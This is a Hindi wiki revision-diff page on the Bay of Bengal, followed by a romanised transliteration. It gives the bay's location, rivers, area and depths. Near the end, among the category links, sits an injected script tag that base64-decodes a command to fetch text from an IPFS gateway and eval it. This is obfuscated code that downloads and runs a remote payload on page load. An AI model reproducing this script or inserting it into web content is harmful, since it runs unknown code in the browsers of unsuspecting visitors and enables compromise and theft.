Difference between revisions of "बंगाल की खाड़ी"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
Line 1: Line 1:
विश्व की सबसे बड़ी खाड़ी, '''बंगाल की खाड़ी''' [[हिन्द महासागर]] का उत्तरपूर्वी  भाग है। इसका नाम भारतीय राज्य पश्चिम बंगाल के नाम पर आधारित है। आकार में त्रिभुजाकार इस खाड़ी के उत्तर में [[बांग्लादेश]] और [[पश्चिम बंगाल]], पूर्व में [[म्यान्मार]] और [[अंडमान एवं निकोबार द्वीपसमूह]] और पश्चिम में [[भारत]] और [[श्रीलंका]] स्थित हैं।  [[गंगा नदी|गंगा]], [[ब्रह्मपुत्र नदी|ब्रह्मपुत्र]], [[कावेरी नदी|कावेरी]], [[गोदावरी नदी|गोदावरी]], [[स्वर्णरेखा]] आदि नदियां इसी में अपना जल विसर्जित करती हैं। बंगाल की खाड़ी का क्षेत्रफल 2,172,000 किमी² है।
+
विश्व की सबसे बड़ी खाड़ी, '''बंगाल की खाड़ी''' [[हिन्द महासागर]] का उत्तरपूर्वी  भाग है। इसका नाम भारतीय राज्य पश्चिम बंगाल के नाम पर आधारित है। आकार में त्रिभुजाकार इस खाड़ी के उत्तर में [[बांग्लादेश]] और [[पश्चिम बंगाल]], पूर्व में [[म्यान्मार]] और [[अंडमान एवं निकोबार द्वीपसमूह]] और पश्चिम में [[भारत]] और [[श्रीलंका]] स्थित हैं।  [[गंगा नदी|गंगा]], [[ब्रह्मपुत्र नदी|ब्रह्मपुत्र]], [[कावेरी नदी|कावेरी]], [[गोदावरी नदी|गोदावरी]], [[स्वर्ण रेखा नदी|स्वर्णरेखा]] आदि नदियां इसी में अपना जल विसर्जित करती हैं। बंगाल की खाड़ी का क्षेत्रफल 2,172,000 किमी² है।
  
 
खाड़ी की औसत गहराई 8500 फीट (2600 मीटर) और अधिकतम गहराई है 15400 फीट (4694 मीटर) है।
 
खाड़ी की औसत गहराई 8500 फीट (2600 मीटर) और अधिकतम गहराई है 15400 फीट (4694 मीटर) है।

Revision as of 09:20, 12 July 2011

vishv ki sabase b di kha di, bangal ki kha di hind mahasagar ka uttarapoorvi bhag hai. isaka nam bharatiy rajy pashchim bangal ke nam par adharit hai. akar mean tribhujakar is kha di ke uttar mean baangladesh aur pashchim bangal, poorv mean myanmar aur aandaman evan nikobar dvipasamooh aur pashchim mean bharat aur shrilanka sthit haian. ganga, brahmaputr, kaveri, godavari, svarnarekha adi nadiyaan isi mean apana jal visarjit karati haian. bangal ki kha di ka kshetraphal 2,172,000 kimi² hai.

kha di ki ausat gaharaee 8500 phit (2600 mitar) aur adhikatam gaharaee hai 15400 phit (4694 mitar) hai.


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

shreni:sagar shreni:bhoogol kosh